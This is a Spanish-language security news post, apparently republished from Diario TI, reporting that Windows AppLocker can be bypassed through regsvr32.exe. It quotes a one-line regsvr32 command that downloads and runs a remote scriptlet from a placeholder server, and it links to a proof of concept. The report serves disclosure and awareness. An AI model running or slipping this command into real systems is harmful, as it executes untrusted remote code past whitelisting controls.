Importante función de seguridad de Windows puede ser eludida con sencillo comando

Publicado el 26 abril 2016 ¬ 16:58 pmh.mscComentarios desactivados en Importante función de seguridad de Windows puede ser eludida con sencillo comando


AppLocker puede ser eludida con gran facilidad, utilizando una poco conocida funcionalidad de la herramienta regsrv32.exe, incorporada en Windows.

Con la llegada de Windows 7, los responsables de TI pudieron disponer de una nueva herramienta que permitía autorizar y especificar qué software puede ser ejecutado en los terminales Windows de los usuarios en entornos corporativos. AppLocker hace posible controlar que grupos de usuarios están autorizados para ejecutar programas específicos. Por ejemplo, algunos programas sólo están disponibles para administradores, y otros programas, con por ejemplo juegos, no pueden ser ejecutados en horas de trabajo. Por extensión, esta función permite evitar la ejecución de malware.

Sin embargo, la semana pasada se distribuyó un boletín de seguridad según el cual AppLocker puede ser fácilmente eludido, utilizando una función poco conocida de la herramienta regsrv32.exe- que forma parte del sistema operativo Windows.

El problema fue detectado y descrito en el blog del experto en seguridad informática Casey Smith. Según Smith, un elemento desconocido de regsrv32.exe es la capacidad de descargar y ejecutar scripts desde Internet al escribir parámetros como el siguiente: regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

La URL del comando es sustituida por un archivo provisto de un script, como por ejemplo la prueba de concepto elaborada por Smith, que muestra la ejecución de “cmd.exe”. Según el experto, este comando puede ser sustituido con cualquier programa instalado en la computadora, incluso aquellos que no estén en la lista autorizada con que opera AppLocker.

En este enlace

https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302

se proporciona una lista de ejemplos malignos, y en el siguiente vídeo se presenta la prueba de concepto.
ver https://youtu.be/858QHiUkU9o

Según Smith, regserv32.exe incorpora el soporte adecuado para descargar URL, incluido redireccionamiento y HTTPS. Asimismo, la herramienta no requiere derechos de administrador. El experto considera altamente probable que el procedimiento descrito pueda ser utilizado por intrusos para hacerse del control del sistema.

El sitio Brown Hat Security describe la vulnerabilidad como crítica, debido a que hace posible la ejecución de código aleatorio mediante una herramienta de sistema supuestamente confiable.

Hasta ahora, Microsoft no se ha referido al problema.

Ver información original al respecto en Fuente:
http://diarioti.com/importante-funcion-de-seguridad-de-windows-puede-ser-eludida-con-sencillo-comando/97350

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Noticias, Vulnerabilidades, ,

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies